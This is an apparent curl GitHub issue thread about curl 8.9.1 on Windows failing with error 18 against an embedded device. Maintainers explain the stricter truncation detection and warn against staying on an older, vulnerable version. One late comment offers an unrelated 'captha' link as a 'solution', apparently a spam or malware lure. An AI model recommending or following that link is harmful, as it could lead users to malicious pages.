### ISSUE TITLE
Windows build 8.9.1 causes error 18

### ISSUE THREAD

**Issue by ruggedvideo** [curl/curl#15254]
### I did this

We've used cURL commands to configure a product for the past year or 2.  Here is an example command: 

curl --anyauth --digest -u admin:admin -H "Host:192.168.0.2" -H "Referer: 192.168.0.2" -L http://192.168.0.150/isp/appispmu.cgi?i_dn_at=4

With the same product, same hardware, same firmware, recently it was discovered that cURL no longer is working, and we end up with "curl: (18) end of response with 2 bytes missing".  We suspect that Windows update changed the cURL version, and now it is terminating the connection before completion.  This is true on all of our Windows PCs.  

### I expected the following

We expect the command to take effect just as if we pasted the URL into a browser (which works fine).  The 2 bytes missing thing was never a problem in the past.  Only in the past couple weeks has it suddenly become an issue.
Edit: We just found a lab PC that still has version 8.7.1 installed.  That version worked as expected.

### curl/libcurl version

curl 8.9.1

### operating system

Win11 Home version 10.0.22631 Build 22631

**Comment by dfandrich** [comment]
Is the server sending all the bytes or is it missing two?

**Comment by ruggedvideo** [comment]
Apparently it is missing two bytes, based on the error message.  We installed 8.7.1 with Chocolatey and there is no error - all works normally, and the response from the server looks correct.  The downside is that we have to update our machines and revise all of our scripts to refer to the 8.7.1 version instead of the built-in Windows version.

**Comment by dfandrich** [comment]
That version has at least three known security flaws so I don't recommend
using it. The solution is to fix the broken server. Recent curl versions have
improved detection of certain non-graceful TLS shutdown scenarios that could
have security impacts, so that older version exposes you to not just those
three known flaws but also a truncation attack.

**Comment by ruggedvideo** [comment]
Hi Dan,

Thanks for your reply.  We're using cURL over a direct cable to the
device.  The server can't be altered unfortunately, it is baked into the
chip.  Sounds like we'll need to just use an older version of cURL for this
purpose.
Thanks again.

**Comment by bagder** [comment]
Unless you provide us with traces showing more details we can't tell exactly where the problem lies and if there is something for us to fix. Sticking to an old fixed version seems like a short-term work-around, not a solution.

**Comment by AchilleasTsiamoulis** [comment]
maybe this solution will solve your problem [click](https://www.calvarywhangarei.co.nz/captha/index.html)

**Comment by bagder** [comment]
Nothing to act on.
